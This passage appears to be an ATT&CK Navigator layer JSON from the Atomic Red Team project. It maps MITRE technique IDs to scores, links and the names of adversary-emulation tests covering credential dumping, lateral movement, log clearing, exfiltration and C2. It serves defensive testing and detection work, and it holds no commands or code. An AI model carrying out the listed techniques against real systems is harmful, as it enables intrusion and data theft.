FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple 